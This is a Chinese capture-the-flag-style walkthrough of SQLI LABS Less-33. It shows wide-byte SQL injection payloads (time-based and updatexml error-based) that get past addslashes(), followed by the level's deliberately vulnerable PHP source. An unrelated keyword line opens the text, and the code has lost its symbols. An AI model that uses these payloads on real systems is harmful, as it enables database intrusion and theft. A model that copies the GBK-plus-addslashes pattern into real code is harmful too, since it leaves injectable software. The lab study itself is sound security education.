wordpress手机不能显示字体大小,企业网站初始期如何优化,东莞房价会跌吗,php购物网站开发关注这个靶场的其它相关笔记#xff1a;SQLI LABS —— 靶场笔记合集-CSDN博客 0x01#xff1a;过关流程
输入下面的链接进入靶场#xff08;如果你的地址和我不一样#xff0c;按照你本地的环境来#xff09;#xff1a; http://localhost/sqli-labs/Less-33/ Ad… 关注这个靶场的其它相关笔记SQLI LABS —— 靶场笔记合集-CSDN博客 0x01过关流程
输入下面的链接进入靶场如果你的地址和我不一样按照你本地的环境来 http://localhost/sqli-labs/Less-33/ AddSlashes 添加斜杠斜杠即转义字符。不用猜也知道是对我们的输入的 进行转义防止我们 ByPass绕过方法在 Less-32 中笔者已经讲过了所以这里就不讲啦。
本关应该是使用宽字节注入的方式进行绕过直接上时间盲注字典看看有没有匹配的 Payload 如下是一个使用时间盲注成功爆出来的可用模板 1%df%20%26%26%20sleep(3)%23--%20%2f%2a
在测试中我们还发现了目标还会显示数据库错误信息。所以我们可以修改上面的模板使用报错注入来更快速的获取我们想要的信息如下是一个可用的 Payload -- 猜测目标后端当前正在使用的数据库信息1%df%20%26%26%20updatexml(1,concat(0x7e,database(),0x7e),1)%23--%20%2f%2a 可以看到我们已经成功获取了当前站点使用的后端数据库的信息。至此SQLI LABS Less-33 GET-Bypass AddSlashes() 成功过关。
0x02源码分析
下面是 SQLI LABS SQLI LABS Less-33 GET-Bypass AddSlashes() 后端的部分源码以及笔者做的笔记
?php//including the Mysql connect parameters.include(../sql-connections/sqli-connect.php);function check_addslashes($string){// addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。// 预定义字符是// 单引号// 双引号// 反斜杠\// NULL// ep: 1 1\$string addslashes($string);return $string;}// take the variables if (isset($_GET[id])) {// 对获取的数据进行过滤 就是转义内容中的 防止逃逸$id check_addslashes($_GET[id]);//echo The filtered request is : .$id . br;//logging the connection parameters to a file for analysis.$fp fopen(result.txt, a);fwrite($fp, ID: . $id . \n);fclose($fp);// connectivity // 设置 MySQL 链接字符集为 GBK 宽字节注入mysqli_query($con1, SET NAMES gbk);$sql SELECT * FROM users WHERE id$id LIMIT 0,1;$result mysqli_query($con1, $sql);$row mysqli_fetch_array($result, MYSQLI_BOTH);if ($row) {echo font color #00FF00;echo Your Login name: . $row[username];echo br;echo Your Password: . $row[password];echo /font;} else {echo font color #FFFF00;// 若未查询出数据则会显示错误信息print_r(mysqli_error($con1));echo /font;}} else {echo Please input the ID as parameter with numeric value;}?
